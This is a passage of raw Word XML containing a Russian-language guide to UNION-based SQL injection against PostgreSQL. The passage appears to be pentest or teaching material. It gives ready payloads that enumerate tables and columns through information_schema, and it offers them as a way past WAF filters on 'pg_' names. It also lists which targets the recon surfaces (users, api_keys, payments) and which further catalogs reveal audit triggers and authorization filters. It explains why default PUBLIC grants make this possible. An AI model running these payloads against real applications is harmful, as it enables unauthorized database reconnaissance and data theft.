          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ctid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tableoid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — у них </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attnum &lt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT a.attisdropped</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отсекает логически удалённые колонки (после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE DROP COLUMN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запись остаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для совместимости storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24214D07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'public.users'::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валидирует существование таблицы на этапе парсинга и сразу возвращает её OID. Если таблицы нет, payload падает с ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "public.users" does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это error-based проверка, а не сбой инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94D0FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — `information_schema` как альтернатива при WAF-фильтре на `pg_`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64229D1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF часто блокирует подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. SQL-стандартный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно остаётся открытым и читается PUBLIC: он внутри реализован как view поверх тех же </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t>, но имена в нём другие.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF1DFD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `status`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40240195" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, table_schema || '.' || table_name, 0 FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog', 'information_schema') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D94DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61248CB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer, total FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52365B29" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, table_schema || '.' || table_name, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A540D36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B97DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE table_schema NOT IN ('pg_catalog', 'information_schema') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E3C3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Аналог Payload B для колонок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A2EDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT ordinal_position, column_name || ':' || data_type, 0 FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'users' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67944599" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под капотом фильтрует строки по правам — атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>видит только то, на что у роли есть GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это вариант для атак, где application-роль уже </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">имеет SELECT на целевые таблицы (что почти всегда — иначе само приложение не работает). Для разведки таблиц других ролей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не подходит — нужен прямой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3EE7B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий получает три уровня информации, каждый — пререквизит для следующего шага атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BDE87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Список таблиц</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → выбор цели (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>payments</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4975F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Список колонок с типами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → подбор UNION с совместимым числом и типами колонок для извлечения данных через 3.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384FBF13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Карта схем</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → понимание мульти-tenant архитектуры (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_42.orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_43.orders</w:t>
      </w:r>
      <w:r>
        <w:t>), наличие audit-таблиц, отдельных схем для миграций (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flyway_schema_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alembic_version</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66621225" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Дополнительные полезные каталоги по той же модели:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5EF1E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_index</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — индексы (показывает уникальные ключи, частичные индексы с WHERE-выражениями, выражения индексов как подсказку к семантике колонок).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64730A4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_constraint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — FK/PK/CHECK ограничения (схема связей таблиц).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F0E94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trigger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — какие триггеры висят на таблицах (полезно для понимания audit-логирования: тихие операции через DELETE могут писаться куда-то).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF1F1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_views.definition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — исходный код view (часто там видны фильтры авторизации, которые в самом запросе не очевидны).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20191265" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_indexes.indexdef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> команды текстом (включая выражения индексов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE38062" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC12BAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — настоящие таблицы (физические файлы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_global</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или per-database </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>), а не view с фильтрацией. SELECT на них не зависит от прав на пользовательские таблицы, к которым они описывают метаданные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B5AAA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   По историческим причинам (совместимость со стандартом SQL и переносимостью приложений между БД) SELECT на основные каталоги выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через дефолтные GRANT-ы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE DATABASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> новые БД наследуют этот ACL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5F6BA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format_type(atttypid, atttypmod)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — официальная функция PostgreSQL для конвертации внутреннего OID типа + modifier в строку (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>varchar(255)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>numeric(10,2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Альтернатива через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_type.typname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> показывает «сырое» имя (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bpchar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int4</w:t>
      </w:r>
      <w:r>
        <w:t>), что менее читаемо.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0DF78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
